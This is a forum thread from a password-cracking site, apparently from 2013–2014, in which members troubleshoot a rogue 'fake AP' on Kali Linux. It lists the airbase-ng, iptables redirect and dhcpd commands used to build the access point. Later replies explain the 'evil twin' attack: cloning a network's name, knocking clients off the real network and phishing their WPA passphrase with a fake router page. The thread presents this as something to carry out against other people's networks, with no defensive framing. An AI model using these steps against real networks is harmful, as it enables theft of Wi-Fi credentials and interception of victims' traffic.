NEW: We have a Discord server now. Click here to go there now!

NOTE: Why not use our List Manager to crack your lists? Its easy and enables better management.

NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - DHCP for Fake AP Not Working


13 Results - Page 1 of 1 -
1
Author Message
Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 17:03:51

I have been some time trying to get DHCP working on kali. I notice there has been some confusion with Kali as it now uses
isc-dhcp-server and most tutorials / scripts are for Backtrack.

I have put together (from a collection of posts) the list of commands below.

I am able to get the Fake Ap running and I can connect to it, except I cannot recieve an IP.

Can a Linux guru take a look at my commands and help me out please ?

Thanks.


I am using Kali latest build and all updated. The laptop (client) is set to receive an IP from a DHCP server.


My commands...


###########################################
airmon-ng start wlan0
airbase-ng -c 1 -Z 4 -v -e AP mon0
ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.102:80
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
echo &quot1&quot > /proc/sys/net/ipv4/ip_forward

###########################################
The /etc/dhcp/dhcp.conf looks like this....
###########################################

ddns-update-style interim;
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option domain-name-servers 8.8.8.8;
option routers 192.168.1.255;
range 192.168.1.100 192.168.1.254;
}
###########################################

.
edited by Hash-IT on 01/12/2013


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
eljolot

Status: Senior
Joined: Wed, 15 Aug 2012
Posts: 757
Team:
Reputation: 275 Reputation
Offline
Sun, 01 Dec 2013 @ 17:44:41

Try with wifite.py is also in kali. Well, this is when you are very lazy. just type wifite in the terminal and the script will do almost all for you.


Kill hashes is a way of life
/dev/null/ before dishonor
/dev/null/ antes que el deshonor
CPU: AMD 8350FX
Rig 1: 1 x Radeon HD 7970 Non reference cooler

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 18:02:24

eljolot said:

Try with wifite.py is also in kali. Well, this is when you are very lazy. just type wifite in the terminal and the script will do almost all for you.

Thanks for the suggestion

I would like to be able to do this manually though, I just can't see where I am going wrong.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Sun, 01 Dec 2013 @ 18:06:54

Hash-IT said:

I am able to get the Fake Ap running and I can connect to it, except I cannot recieve an IP.


Just to be sure... You're not doing the encrypted fake AP thing we've discussed earlier, are you?

If you want to set up a fake AP and make the client surf the Internet then you must set up an open access point and hope the client for any reason will connect to you. I mean, in order to exchange packets with the client you need to know the passphrase since all the data is encrypted. The 'tecnique' I wrote about is useful only to obtain the handshake.


Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 18:34:55

hash-ire said:


Just to be sure... You're not doing the encrypted fake AP thing we've discussed earlier, are you?

When I read the line above I just knew I had made a monumental mistake

hash-ire said:

If you want to set up a fake AP and make the client surf the Internet then you must set up an open access point and hope the client for any reason will connect to you. I mean, in order to exchange packets with the client you need to know the passphrase since all the data is encrypted. The 'tecnique' I wrote about is useful only to obtain the handshake.

I think this must be it, I wrongfully assumed two things.

The first that the IP etc was supplied BEFORE the encryption started.

The second was that I could not imagine the fake AP attack to work if the user was presented with an open unencrypted connection warning when they are used to being on a WPA network. I assumed there must have been some clever goings on in the background to present the fake AP As an encrypted one.

I think I need to test it with this line changed...

airbase-ng -c 1 -Z 4 -v -e AP mon0

To this...

airbase-ng -c 1 -v -e AP mon0

Thank you once again hash-ire, I am embarrassed by my n00bness and also a bit annoyed that I didn't ask this question this morning instead of wasting all day trying to get this to work

I will test and report back soon

Thanks.

Edit to say...

Forgot to mention, this is not to catch the WPA key, I am trying to make a fake router page pop up and get the user to enter the WPA PSK. The other WPA from client thing works great, thanks

.
edited by Hash-IT on 01/12/2013


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 19:00:57

Well hash-ire it certainly looks more promising

I get several repeat messages in the DCHP command window now when I try to connect the laptop.

DHCPACK on 192.168.1.100 to 00:11:22:33:44:55 (LapTop) via at0
DHCPREQUEST for 192.168.1.100 (192.168.1.1) from 00:11:22:33:44:55 (LapTop) via at0

etc

So things do look better

I leave it to connect but it goes no further. All the laptop (client) tells me is that it is waiting for an IP address. I leave it for over 60 seconds and then I get the usual windows limited or no connectivity warning.

Nearly there LOL Any idea's ?


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Mon, 02 Dec 2013 @ 16:31:43

Well, after 3 days of stress I think I have found the problem.

It is hardware.

Looks like I have been setting it all up OK software wise but when I tested I used the laptop internal wifi card.

For some reason using that internal card it doesn't work. However that card connects perfectly well to my actual hardware AP. Not sure why it is different.

Anyway I used my other external dongle on the laptop and it all worked ok first time.

Problem is now I am not sure what I had done software wise after much messing about. LOL

Not sure if I should leave this thread up, what do you think ? I don't want to confuse others at a later date.



Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Fri, 06 Dec 2013 @ 20:53:36

I'm glad you solved it.

Just a quick note. What you are trying to do has its own name. It's called evil twin .

Basically you set up a fake open access point with the same ESSID of the targeted network. Then you keep disconnecting the client of that network. Hopefully the user will open up the wifi manager and connect to you evil AP. At this point when the user will open up his browser you'll redirect him to fake AP configuration page where the user will be asked to enter his password. Then when you have the key, obviously you just stop everything you've set up and you're done.


Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sat, 07 Dec 2013 @ 18:22:14

Thanks hash-ire.

I have the network part all working, very strange about the problem with one piece of hardware. That same wifi hardware works on others !

Well I say all working but the DNSspoof doesn't forward any page with a sub page, like mysite.com/anotherpage. it works on mysite.com though. Very odd bug

Sorry for my late reply but I haven't been able to log in LOL


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Wed, 11 Dec 2013 @ 12:12:37

Oh no

I may have spoke too soon.

This in fact might not be a hardware issue.

I was trying to demonstrate this fake AP and I could not get it to work on anything other than my own laptop and PC. This laptop has an Alpha wifi card.

My main base unit (PC) has another alpha card, so the 2 computers with alpha cards can perform the full attack, everything worked great.

So it seems as if any other card or internal wifi (victim side) does not allow connecting to my fake AP. Very strange.

Anyone have any suggestions ?


Edit:

Looks like this might be a known bug.


https://forums.kali.org/showthread.php?4643-Create-Hotsopt-on-Kali-linux


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
8E3B635F

Status: Trusted
Joined: Wed, 19 Feb 2014
Posts: 640
Team:
Reputation: 645 Reputation
Offline
Sun, 23 Feb 2014 @ 11:33:35

Hash-IT said:

Oh no

I may have spoke too soon.

This in fact might not be a hardware issue.

I was trying to demonstrate this fake AP and I could not get it to work on anything other than my own laptop and PC. This laptop has an Alpha wifi card.

My main base unit (PC) has another alpha card, so the 2 computers with alpha cards can perform the full attack, everything worked great.

So it seems as if any other card or internal wifi (victim side) does not allow connecting to my fake AP. Very strange.

Anyone have any suggestions ?


Edit:

Looks like this might be a known bug.


https://forums.kali.org/showthread.php?4643-Create-Hotsopt-on-Kali-linux

Don't know if you are still having problems with this but I found a website that shows you how to use easycreds and pwnstar and
also how to setup the dhcp on Kali - 4th paragraph

http://secjohn.blogspot.co.uk/2013/08/fake-ap-on-kali-linu.html

I have follow this before and it worked

Rab.


Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 23 Feb 2014 @ 11:39:43

user said:

Don't know if you are still having problems with this but I found a website that shows you how to use easycreds and pwnstar and
also how to setup the dhcp on Kali - 4th paragraph

http://secjohn.blogspot.co.uk/2013/08/fake-ap-on-kali-linu.html

I have follow this before and it worked

Rab.

Hi

Thanks for your link

I am still interested in this subject but I am busy with 3 other projects just now. I would however like to sort this issue out at some point.

As far as I can tell my problem is that I use Alpha Network wifi adaptors. For some reason they only talk to other Alpha Network adaptors and nothing else when using them in the fake AP attack.

All I have been able to find out so far is that it "may" be a driver problem.

Can I ask if you used Alpha Network adaptors when it worked for you ?

Thanks.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
nifty nerd

Status: n/a
Joined: Sun, 21 Sep 2014
Posts: 1
Team:
Reputation: 0 Reputation
Offline
Sun, 21 Sep 2014 @ 09:11:01

Hi
can you help me with this.

So far i can create access point and but when the client tries to connect it i get "No internet Access" - windows 7
And than when i troubleshoot it says dns error or dns not responding.
My setting seems correct.
Tried using with two wifi adapters and same error.Now with Wired and wireless same error.
Any help would be appreciated.
If you guys need anything else do let me know



13 Results - Page 1 of 1 -
1

We have a total of 211877 messages in 25988 topics.
We have a total of 22995 registered users.
Our newest registered member is PassGuy25.